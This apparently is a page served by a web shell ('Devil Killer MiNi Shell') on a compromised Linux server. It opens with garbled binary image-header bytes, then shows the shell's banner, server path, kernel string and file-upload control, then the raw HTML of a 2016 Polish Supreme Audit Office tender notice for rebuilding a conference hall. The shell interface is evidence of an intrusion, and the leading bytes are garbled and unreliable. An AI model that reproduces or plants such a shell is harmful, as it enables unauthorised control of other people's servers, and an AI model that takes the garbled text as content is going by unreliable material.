JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/41603-N-2016.html

<p class="kh_header"><b>Warszawa: Kompleksowa przebudowa sali im. L. Kaczyńskiego usytuowanej w budynku Najwyższej Izby Kontroli w Warszawie, przy ul. Filtrowej 57</b><br>
<b>Numer ogłoszenia: 41603 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Najwyższa Izba Kontroli , ul. Filtrowa 57, 02-056 Warszawa, woj. mazowieckie, tel. 022 4445000, faks 022 4445415, 4445410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nik.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa przebudowa sali im. L. Kaczyńskiego usytuowanej w budynku Najwyższej Izby Kontroli w Warszawie, przy ul. Filtrowej 57.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>Zaprojektowanie i wykonanie kompleksowej przebudowy sali im. L. Kaczyńskiego usytuowanej w budynku Najwyższej Izby Kontroli w Warszawie, przy ul. Filtrowej 57 (dalej zwanej Salą) na podstawie koncepcji wystroju wnętrz oraz koncepcji poprawy akustyki, a w szczególności:<br>
A.	Wykonanie dokumentacji projektowej<br>
B.	Wykonanie instalacji sanitarnej i elektrycznej<br>
C.	Wykonanie systemu nagłośnienia ogólnego Sali,<br>
D.	Wykonanie cyfrowy systemu konferencyjnego Sali<br>
E.	Dostawa i montaż oświetlenia głównego<br>
F.	Wymiana wykładziny dywanowej<br>
G.	Malowanie pomieszczeń wraz z montażem paneli akustycznych, tapety<br>
H.	Dostawa i wymiana drzwi wewnętrznych<br>
I.	Dostawa i montaż nowych karniszy<br> 
J.      Wykonanie sufitu akustycznego<br>
K.	Dostawa i montaż mebli<br>
L.	Roboty towarzyszące i tymczasowe ujęte w Programie Funkcjonalno-Użytkowym, który zostanie udostępniony wraz ze Specyfikacją Istotnych Warunków Zamówienia, dalej SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 6%  wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 79.93.20.00-6, 71.22.10.00-3, 71.25.00.00-5, 45.30.00.00-0, 45.40.00.00-1, 45.44.21.00-8, 45.43.21.11-5, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 30 000,00 (słownie: trzydzieści tysięcy) zł.<br>
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem terminu składania ofert, w jednej lub kilku następujących formach:<br>
a. pieniądzu,<br>
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br>
c. gwarancjach bankowych,<br>
d. gwarancjach ubezpieczeniowych,<br>
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz.1804 ze zm.)<br>
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego o numerze 92 1010 1010 0036 7813 9120 0000. Wniesienie wadium w pieniądzu będzie skuteczne tylko wówczas, gdy wymagana kwota znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br>
4. W przypadku wadium wnoszonego w formie/formach określonych w pkt 2 lit. b - e, oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć w siedzibie Zamawiającego przy ul. Filtrowej 57 w Sekretariacie Biura Rachunkowości, pok. 23.<br>
5. Z treści gwarancji/poręczenia musi jednocześnie wynikać:<br>
- nazwa zleceniodawcy (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (podmiotu udzielającego gwarancji/poręczenia) oraz adresy ich siedzib,<br>
- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br>
- kwota gwarancji/poręczenia,<br>
- termin ważności gwarancji/poręczenia, obejmujący cały okres związania ofertą, począwszy od dnia wyznaczonego na dzień składania ofert,<br>
- bezwarunkowe, nieodwołalne, płatne na pierwsze żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w przypadku wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a lub ust. 5 ustawy z dnia 29 stycznia 2004 r Prawo zamówień Publicznych ( Dz. U. z 2015 r., poz 2164), dalej ustawy<br>
6. Niewniesienie wadium w wymaganym terminie (także na przedłużony okres związania ofertą), wysokości lub formie, skutkuje wykluczeniem Wykonawcy z postępowania.<br>
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:<br>
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,<br>
- którego oferta została wybrana odmówi podpisania umowy w sprawie przedmiotowego zamówienia publicznego na warunkach określonych w ofercie,<br>
- nie wniesie wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w SIWZ,<br>
- zawarcie umowy w sprawie przedmiotowego zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br>
Ocena spełniania warunku nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z wnioskiem o dopuszczeniu do udziału w postępowaniu, zwanego dalej wnioskiem (wzór dokumentu dostępny pod adresem http://bip.nik.gov.pl/zamowienia-publiczne), stanowiącym Załącznik nr 1 do ogłoszenia, oświadczenia o spełnieniu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy, które stanowi Załącznik nr 2 do ogłoszenia (wzór dokumentu dostępny pod adresem http://bip.nik.gov.pl/zamowienia-publiczne), dalej oświadczenie.<br>
Forma dokumentów: oświadczenie musi być złożone w formie oryginału</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują<br> 
a) co najmniej 1 zamówienie obejmujące swym zakresem opracowanie projektu aranżacji sali konferencyjnej lub pomieszczenia reprezentacyjnego;<br>
b) co najmniej 1 zamówienie obejmujące swym zakresem opracowanie projektu akustyki sali konferencyjnej lub sali widowiskowej.<br>
Ocena spełniania warunku nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z wnioskiem:<br>
1.oświadczenia,<br>
2.wykazu zamówień stanowiącego Załącznik nr 3 do ogłoszenia (wzór dokumentu dostępny pod adresem http://bip.nik.gov.pl/zamowienia-publiczne) oraz dowodów o których mowa w pkt III.4.1), .<br>
Forma dokumentów:<br>
oświadczenie musi być złożone w formie oryginału<br>
Wykaz zamówień musi być złożony w formie oryginału lub kopii poświadczonej własnoręcznym podpisem i dopiskiem za zgodność z oryginałem, przez osobę uprawnioną do reprezentowania Wykonawcy<br>.

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie od udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 2 zamówienia polegające na  remoncie lub budowie lub przebudowie (w rozumieniu przepisów ustawy Prawo budowlane) sal/i konferencyjnych/nej lub sali widowiskowej,  o wartości każdego zamówienia co najmniej  1 000 000 zł brutto, z czego co najmniej 1 zamówienie obejmowało wykonanie robót budowlanych w zakresie akustyki wewnętrznej.<br>
Ocena spełniania warunku nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z wnioskiem:<br>
1.oświadczenia,<br>
2.wykazu robót stanowiącego Załącznik nr 4 do ogłoszenia (wzór dokumentu dostępny pod adresem http://bip.nik.gov.pl/zamowienia-publiczne) oraz dowodów, o których mowa w pkt III.4.1).<br>
Forma dokumentów:<br>
oświadczenie musi być złożone w formie oryginału<br>
Wykaz robót musi być złożony w formie oryginału lub kopii poświadczonej własnoręcznym podpisem i dopiskiem za zgodność z oryginałem, przez osobę uprawnioną do reprezentowania Wykonawcy<br>.

UWAGA!<br>
Dla potrzeb postępowania pod pojęciem:<br>
a)	pomieszczenia reprezentacyjnego należy rozumieć budynek lub jego wydzieloną część (salę) o przeznaczeniu reprezentacyjnym. Pojęcie to jednak nie obejmuje holi, korytarzy i poczekalni.<br>
b)	Sali widowiskowej należy rozmieć w szczególności salę koncertową, salę teatralną, salę kinową.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br>
Ocena spełniania warunku nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z wnioskiem oświadczenia<br>
Forma dokumentów:<br>
oświadczenie musi być złożone w formie oryginału<br></p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują:<br>
1.	co najmniej 1 osobą - Projektantem  akustyki:<br>
a)	-posiadającym co najmniej wykształcenie wyższe pierwszego stopnia w zakresie inżynierii dźwięku lub akustyki;<br> 
b)	posiadającym co najmniej pięcioletnie doświadczenie zawodowe przy opracowywaniu projektów akustyki z zakresu akustyki wnętrz;<br>
c)	który w ciągu 36 miesięcy przed upływem terminu składania wniosków opracował co najmniej 2 projekty akustyki pomieszczeń: sali konferencyjnej lub sali widowiskowej.<br>

2.	co najmniej 1 osobą - Projektantem nagłośnienia:<br>
a)	posiadającym co najmniej wykształcenie wyższe pierwszego stopnia w zakresie inżynierii dźwięku lub akustyki;<br>
b)	który w ciągu 36 miesięcy przed upływem terminu składania wniosków  opracował co najmniej 2 projekty nagłośnienia lub systemu konferencyjnego<br> 

3.	co najmniej 1 osobą - Projektantem - z uprawnieniami do projektowania bez ograniczeń w specjalności architektonicznej;<br>

4.	co najmniej 1 osobą - Projektantem - z uprawnieniami do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br>

5.	o najmniej 1 osobą - Kierownikiem robót - z uprawnieniami do kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej;<br>
6.	co najmniej 1 osobą - Kierownikiem robót - z uprawnieniami do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br>

7.	co najmniej 2 osobami - Elektrykami - posiadającymi uprawnienia SEP powyżej 1KV.<br>

UWAGA!<br>
Dla potrzeb postępowania pod pojęciem:<br> 
a)	pomieszczenia reprezentacyjnego należy rozumieć budynek lub jego wydzieloną część (salę) o przeznaczeniu reprezentacyjnym. Pojęcie to jednak nie obejmuje holi, korytarzy i poczekalni.<br>
b)	Sali widowiskowej należy rozmieć w szczególności salę koncertową, salę teatralną, salę kinową.<br>

Zgodnie z zasadami określonymi we właściwych przepisach, Zamawiający dopuszcza także pełnienie ww. funkcji przez osoby posiadające odpowiednie kwalifikacje zawodowe zdobyte w innych państwach na zasadach określonych w <br>
a)	ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2016 r. poz. 290) oraz<br>
b)	ustawie z dnia 15 grudnia 2000 roku o samorządach zawodowych architektów, inżynierów budownictwa (tj. Dz. U. 2014, poz. 1946 ze zm.) oraz<br>
c)	ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 poz. 65) .<br>


Ocena spełniania warunku nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z wnioskiem:<br>
1.oświadczenia,<br>
2.wykazu osób o którym mowa w pkt III.4.1) stanowiącego Załącznik nr 5 do ogłoszenia (wzór dokumentu dostępny pod adresem http://bip.nik.gov.pl/zamowienia-publiczne).<br>

Forma dokumentów:<br>
oświadczenie musi być złożone w formie oryginału<br>
Wykaz osób musi być złożony w formie oryginału lub kopii poświadczonej własnoręcznym podpisem i dopiskiem za zgodność z oryginałem, przez osobę uprawnioną do reprezentowania Wykonawcy<br>.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają środki finansowe w wysokości nie mniejszej niż 500 000,00 (słownie:pięćset tysięcy) zł lub posiadają zdolność kredytową w wysokości nie mniejszej niż 500 000,00 (słownie: pięćset tysięcy) zł.<br>
Ocena spełniania warunku nastąpi według formuły spełnia-nie spełnia na podstawie dostarczonego wraz z ofertą:<br>
1.oświadczenia<br>
2.informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, o której mowa w pkt III.4.1). Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br>
Forma dokumentów:<br>
oświadczenie musi być złożone w formie oryginału<br>
informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej lub inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku, musi być złożony w formie oryginału lub kopii poświadczonej własnoręcznym podpisem i dopiskiem za zgodność z oryginałem, przez osobę uprawnioną do reprezentowania Wykonawcy<br>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W wykazie należy wskazać jedynie roboty najważniejsze tj. roboty budowlane potwierdzające spełnianie warunku udziału w postępowaniu, o którym mowa w pkt III.3.2;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie należy wskazać jedynie usługi najważniejsze tj. usługi potwierdzające spełnianie warunku udziału w postępowaniu, o którym mowa w pkt III.3.2;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej innego podmiotu wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku;;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca przy realizacji przedmiotu zamówienia będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (wzór wg Załącznika nr 8 do ogłoszenia dostępny pod adresem http://bip.nik.gov.pl/zamowienia-publiczne) lub inny dokument, z którego takie zobowiązanie wynika np. umowa, itp. oraz dokumenty, o których mowa w sekcji III.4.1 - jeżeli dotyczy, z wyjątkiem oświadczenia o spełnianiu warunków udziału w postępowaniu.<br>
2. Podmioty udostępniające Wykonawcy zasoby w postaci wiedzy i doświadczenia traktowane będą jako podmioty, które będą brały udział w realizacji zamówienia.<br>
